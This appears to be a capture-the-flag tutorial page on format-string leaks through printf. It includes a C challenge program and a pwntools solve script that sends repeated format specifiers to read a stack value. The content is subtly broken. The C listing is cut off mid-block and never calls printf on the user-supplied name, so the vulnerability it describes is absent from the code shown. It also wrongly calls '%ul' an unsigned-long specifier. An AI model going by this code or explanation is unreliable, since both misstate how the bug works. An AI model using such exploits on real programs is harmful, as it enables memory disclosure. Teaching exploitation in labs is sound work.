printf Leak

printf Leak #

Description #

It is possible to leak variables in a function by abusing printf. If you can control the format string, you can send a bunch of format specifiers such as %s for strings, and %ul for numbers (unsigned long). This will leak values of the stack which will become much more important in the future as we start enabling default memory protections such as PIE and canaries.

Example #

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
// gcc -g -o chal chal.c

int main() {
    long key = rand();
    long guess = 0;

    char name[32];

    puts("Welcome! If you can guess the number, you get the flag!");

    // Username
    puts("First, what is your name:");
    fgets(name, 31, stdin);

    // Guess
    puts("Now, guess the number:");
    scanf("%d", &guess);
    if (guess == key) {
        puts("Impressive. flag{win}");
    } else {
        printf("Sorry, better luck next time. The number was: %lu\n", key);

Solution #

Send a number of %ul as the username till we find the key.

Solve Script #

import pwn

pwn.context.log_level = "critical"

p = pwn.process("./chal")

# Find the offset
p.sendlineafter(b"name:", b" %ul"*7)

number = p.recvline().decode().split(" ")[-1].strip()


p.sendlineafter(b"number:", number.encode())

Files #